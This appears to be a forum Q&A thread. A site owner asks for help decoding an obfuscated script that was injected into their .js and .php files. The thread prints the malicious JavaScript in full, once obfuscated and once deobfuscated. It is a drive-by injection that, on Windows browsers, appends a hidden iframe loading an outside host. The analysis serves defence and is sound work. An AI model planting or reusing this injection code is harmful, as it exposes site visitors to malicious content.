# malware code insert script to my .js .php and include file. help me to decode script

Tags: malware

My website were inserted these scripts about 4 times already. I have changed ftp password too many times but it still be able to insert to my webpage. 
Pls help me to decode two these scripts. Maybe I can find more details about this malware script.

`<script>var MaZsKgZUgCCRdH = ["98","73","79","45","64","92","91","66","35","70","82","4","65","80","17","76","3","74","41","69","1","40","77","52","54","42","9","22","88","0","30","59","26","94","99","85","16","86","55","34","81","67","56","97","36","78","63","72","38","43","62","7","33","96","31","25","90","19","48","6","14","87","28","13","23","24","68","39","61","49","37","71","10","12","83","44","29","32","84","50","18","100","47","15","51","20","53","11","93","58","60","2","95","8","27","75","46","21","5","89","57"];var a = ["83","78","4","74","7","87","29","29","21","20","29","93","11","29","14","7","87","78","83","82","72","91","78","26","82","94","83","83","12","29","94","83","26","26","74","73","20","78","5","83","95","21","95","11","2","72","72","84","7","82","86","24","84","83","95","73","94","4","78","64","24","93","9","73","91","29","26","95","95","21","72","7","93","83","0","92","78","95","87","92","82","95","89","15","91","85","21","9","91","95","78","95","87","82","20","6","77","85","6","89","93"];function wCBFqxiBsScuHg(VCAscVoJW, IU){var CgoBQGzvdo='';for(var HYDZhkaoy=0;HYDZhkaoy< VCAscVoJW.length;HYDZhkaoy++)CgoBQGzvdo+=String.fromCharCode(parseInt(VCAscVoJW[IU[HYDZhkaoy]])^58);return CgoBQGzvdo;}function DUJiJVvMZAgBr(xZwtmwHJjcOg, ePUFHpNSM){var U='';for(var yBIrf=0;yBIrf< xZwtmwHJjcOg.length;yBIrf++)U += String.fromCharCode(parseInt(xZwtmwHJjcOg[yBIrf], 16)^ePUFHpNSM); return U;}(function(TfEh){var PGMRLirigv=function(){if(!TfEh.BcRTDdLpRbS){TfEh.BcRTDdLpRbS=133;var GQdPVJX = ["20","2b","27","31","29","21","2a","30"];var hQxQnSWejILY=DUJiJVvMZAgBr(GQdPVJX, 68);var CQjjfdHLQzuftp = ["7f","6e","79","7d","68","79","59","70","79","71","79","72","68"];var kpCkPGQ=DUJiJVvMZAgBr(CQjjfdHLQzuftp, 28);var DOdnKPRxnUn = ["d3","de","c1"];var m=DUJiJVvMZAgBr(DOdnKPRxnUn, 183);var Hsz = ["90","97","97","9c","8b","b1","ad","b4","b5"];var bBetq=DUJiJVvMZAgBr(Hsz, 249);var el = ["1f","18","15","0","9"];var FsoPN=DUJiJVvMZAgBr(el, 108);var yNkqOiY = ["fd","f0","ea","e9","f5","f8","e0"];var YPtQveRMcV=DUJiJVvMZAgBr(yNkqOiY, 153);var JjrPjK = ["ed","ec","ed","e6"];var HBchKFWjQp=DUJiJVvMZAgBr(JjrPjK, 131);var ZDHWSZcCzlmCy = ["8e","83","88","95"];var atpwWUCri=DUJiJVvMZAgBr(ZDHWSZcCzlmCy, 236);var knAtUGVSknpiOb = ["7f","6e","6e","7b","70","7a","5d","76","77","72","7a"];var KNMcxqPBoFEzlG=DUJiJVvMZAgBr(knAtUGVSknpiOb, 30);if(function FRlTmsRJNFmnm(){var iBcOzbBLaJib=true;var yLjfQ=true;var Xbj=/*@cc_on true; @*/false;if(Xbj){iBcOzbBLaJib = true;}else{iBcOzbBLaJib = false;}var VPpowKZVXUiA = ["22","1c","1b"];var GZlLbRNA=DUJiJVvMZAgBr(VPpowKZVXUiA, 117);var FzCjYUCHuJYWjz = ["89","a5","a7"];var zudnwEuKBbXyT=DUJiJVvMZAgBr(FzCjYUCHuJYWjz, 196);var PUEAgmcfh = ["2d","8","f","14","19"];var VyhuFnerNWUuk=DUJiJVvMZAgBr(PUEAgmcfh, 97);var yM = ["af","a0","b7","a8","a6","a0","b5","ae","b3"];var bDiUBGqVfYZ=DUJiJVvMZAgBr(yM, 193);var TYBSKqXbNiGcz = ["4d","4a","40","41","5c","6b","42"];var aMpCvJBLTfhMUw=DUJiJVvMZAgBr(TYBSKqXbNiGcz, 36);var TxHK = ["f5","e9","e4","f1","e3","ea","f7","e8"];var BjNy=DUJiJVvMZAgBr(TxHK, 133);var oGeLQlnBCmKgsn=window[bDiUBGqVfYZ][BjNy][aMpCvJBLTfhMUw](GZlLbRNA) > -1;if(oGeLQlnBCmKgsn){yLjfQ = true;}else{yLjfQ = false;}return (iBcOzbBLaJib&&yLjfQ);}()){var FnxPXniTOHuU=window[hQxQnSWejILY][kpCkPGQ](m);FnxPXniTOHuU[bBetq]=wCBFqxiBsScuHg(a, MaZsKgZUgCCRdH);FnxPXniTOHuU[FsoPN][YPtQveRMcV]=HBchKFWjQp;window[hQxQnSWejILY][atpwWUCri][KNMcxqPBoFEzlG](FnxPXniTOHuU);}}};var iFyMPH = ["b2","b7","b7","96","a5","b6","bd","a7","9f","ba","a0","a7","b6","bd","b6","a1"];var GkMNyvoZ=DUJiJVvMZAgBr(iFyMPH, 211);var uQO = ["2f","3a","3a","2f","2d","26","b","38","2b","20","3a"];var QuPuK=DUJiJVvMZAgBr(uQO, 78);var MouT = ["87","86"];var KdAtYlyqzy=DUJiJVvMZAgBr(MouT, 232);var VwQKdbWCag = ["7a","79","77","72"];var oicFpeAL=DUJiJVvMZAgBr(VwQKdbWCag, 22);var CPrCjZTfm = ["76","7f","73","65","63"];var hMiVnsaLJ=DUJiJVvMZAgBr(CPrCjZTfm, 16);var gAcCaolkjo = ["67","69","70","77"];var vB=DUJiJVvMZAgBr(gAcCaolkjo, 5);var MZeG = ["11","13","9","f","19","11","13","a","19"];var SQ=DUJiJVvMZAgBr(MZeG, 124);var HA = ["4b","40","42","5d","4a","4e","4b","56"];var XzF=DUJiJVvMZAgBr(HA, 47);var xAGaJwayje;if(TfEh[GkMNyvoZ])xAGaJwayje=GkMNyvoZ;else xAGaJwayje=QuPuK;var XHF=[oicFpeAL, hMiVnsaLJ, vB, SQ, XzF];for(JNsqiuHb in XHF){TfEh[xAGaJwayje](XHF[JNsqiuHb], PGMRLirigv, false);TfEh[xAGaJwayje]('on' + XHF[JNsqiuHb], PGMRLirigv, false);}})(window)</script>`

Comment: Generally, these script end up on your server via a vulnerable php/asp file. You should check your webserver logs first to see where they are coming from.

Comment: There's nothing in the script that hints about how it got there.

Answer (score 0):

If you crawl through the code and methodically replace the junk identifier names, it makes a lot more sense.   Most of the code and identifiers are just there to obscure, and a lot of the rest of it just looks like boilerplate code for browser-compatible ways to do things like attach events.

It also makes a pretty big deal of checking that you're on Windows, for some reason, but that doesn't change the payload that's eventually delivered.

The piece that deploys the payload to the page is here:

```
   var newElement = window[_document][_createElement](_div);
   newElement[_innerHTML] = decodeString(key, payload);
   newElement[_style][_display] = _none;
   window[_document][_body][_appendChild](newElement);
```

The payload decrypts as:

```
  <iframe src='http://teenee.&lt;OBFUSCATED&gt;.com/speedo.msg?13'
    width='436' height='158' align="right"></iframe>
```

Here's the full script as far as I decoded it:

```
<script>
var payload = ["98", "73", "79", "45", "64", "92", "91", "66", "35", "70", "82", "4", "65", "80", "17", "76", "3", "74", "41", "69", "1", "40", "77", "52", "54", "42", "9", "22", "88", "0", "30", "59", "26", "94", "99", "85", "16", "86", "55", "34", "81", "67", "56", "97", "36", "78", "63", "72", "38", "43", "62", "7", "33", "96", "31", "25", "90", "19", "48", "6", "14", "87", "28", "13", "23", "24", "68", "39", "61", "49", "37", "71", "10", "12", "83", "44", "29", "32", "84", "50", "18", "100", "47", "15", "51", "20", "53", "11", "93", "58", "60", "2", "95", "8", "27", "75", "46", "21", "5", "89", "57"];
var key = ["83", "78", "4", "74", "7", "87", "29", "29", "21", "20", "29", "93", "11", "29", "14", "7", "87", "78", "83", "82", "72", "91", "78", "26", "82", "94", "83", "83", "12", "29", "94", "83", "26", "26", "74", "73", "20", "78", "5", "83", "95", "21", "95", "11", "2", "72", "72", "84", "7", "82", "86", "24", "84", "83", "95", "73", "94", "4", "78", "64", "24", "93", "9", "73", "91", "29", "26", "95", "95", "21", "72", "7", "93", "83", "0", "92", "78", "95", "87", "92", "82", "95", "89", "15", "91", "85", "21", "9", "91", "95", "78", "95", "87", "82", "20", "6", "77", "85", "6", "89", "93"];

function decodeString(msg, key) {
    var retval = '';
    for (var i = 0; i < msg.length; i++) retval += String.fromCharCode(parseInt(msg[key[i]]) ^ 58);
    return retval;
}

function decodeString2(msg, key) {
    var retval = '';
    for (var i = 0; i < msg.length; i++) retval += String.fromCharCode(parseInt(msg[i], 16) ^ key);
    return retval;
}

(function (_window) {
    var executePayload = function () {
        if (!_window.storedData) {
            _window.storedData = 133;
            var crypt1 = ["20", "2b", "27", "31", "29", "21", "2a", "30"];
            var _document = decodeString2(crypt1, 68);
            var crypt2 = ["7f", "6e", "79", "7d", "68", "79", "59", "70", "79", "71", "79", "72", "68"];
            var _createElement = decodeString2(crypt2, 28);
            var crypt3 = ["d3", "de", "c1"];
            var _div = decodeString2(crypt3, 183);
            var crypt4 = ["90", "97", "97", "9c", "8b", "b1", "ad", "b4", "b5"];
            var _innerHTML = decodeString2(crypt4, 249);
            var crypt5 = ["1f", "18", "15", "0", "9"];
            var _style = decodeString2(crypt5, 108);
            var crypt6 = ["fd", "f0", "ea", "e9", "f5", "f8", "e0"];
            var _display = decodeString2(crypt6, 153);
            var crypt7 = ["ed", "ec", "ed", "e6"];
            var _none = decodeString2(crypt7, 131);
            var crypt9 = ["8e", "83", "88", "95"];
            var _body = decodeString2(crypt9, 236);
            var crypt10 = ["7f", "6e", "6e", "7b", "70", "7a", "5d", "76", "77", "72", "7a"];
            var _appendChild = decodeString2(crypt10, 30);
            if (function FRlTmsRJNFmnm() {
                var iBcOzbBLaJib = true;
                var yLjfQ = true;
                var Xbj = /*@cc_on true; @*/ false;
                if (Xbj) {
                    iBcOzbBLaJib = true;
                } else {
                    iBcOzbBLaJib = false;
                }
                var crypt1 = ["22", "1c", "1b"];
                var _Win = decodeString2(crypt1, 117);
                var crypt2 = ["89", "a5", "a7"];
                var _Mac = decodeString2(crypt2, 196);
                var crypt3 = ["2d", "8", "f", "14", "19"];
                var _Linux = decodeString2(crypt3, 97);
                var crypt4 = ["af", "a0", "b7", "a8", "a6", "a0", "b5", "ae", "b3"];
                var _navigator = decodeString2(crypt4, 193);
                var crypt5 = ["4d", "4a", "40", "41", "5c", "6b", "42"];
                var _indexOf = decodeString2(crypt5, 36);
                var crypt6 = ["f5", "e9", "e4", "f1", "e3", "ea", "f7", "e8"];
                var _platform = decodeString2(crypt6, 133);
                var browserSaysWindows = window[_navigator][_platform][_indexOf](_Win) > -1;
                if (browserSaysWindows) {
                    yLjfQ = true;
                } else {
                    yLjfQ = false;
                }
                return (iBcOzbBLaJib && yLjfQ);
            }()) {
                var newElement = window[_document][_createElement](_div);
                newElement[_innerHTML] = decodeString(key, payload);
                newElement[_style][_display] = _none;
                window[_document][_body][_appendChild](newElement);
            }
        }
    };
    var crypt1 = ["b2", "b7", "b7", "96", "a5", "b6", "bd", "a7", "9f", "ba", "a0", "a7", "b6", "bd", "b6", "a1"];
    var __addEventListener = decodeString2(crypt1, 211);
    var crypt2 = ["2f", "3a", "3a", "2f", "2d", "26", "b", "38", "2b", "20", "3a"];
    var _attachEvent = decodeString2(crypt2, 78);
    var crypt3 = ["87", "86"];
    var KdAtYlyqzy = decodeString2(crypt3, 232);
    var crypt4 = ["7a", "79", "77", "72"];
    var _load = decodeString2(crypt4, 22);
    var crypt5 = ["76", "7f", "73", "65", "63"];
    var focus = decodeString2(crypt5, 16);
    var crypt6 = ["67", "69", "70", "77"];
    var _blur = decodeString2(crypt6, 5);
    var crypt7 = ["11", "13", "9", "f", "19", "11", "13", "key", "19"];
    var _mousemove = decodeString2(crypt7, 124);
    var crypt8 = ["4b", "40", "42", "5d", "4a", "4e", "4b", "56"];
    var _domready = decodeString2(crypt8, 47);
    var _addEventListener;
    if (_window[__addEventListener]) _addEventListener = __addEventListener;
    else _addEventListener = _attachEvent;
    var eventList = [_load, focus, _blur, _mousemove, _domready];
    for (events in eventList) {
        _window[_addEventListener](eventList[events], executePayload, false);
        _window[_addEventListener]('on' + eventList[events], executePayload, false);
    }
})(window)
</script>
```

Unfortunately, there's not much clue as to how it got here, just what it's doing:  injecting an IFrame into your page, and you probably already knew that.

Good luck!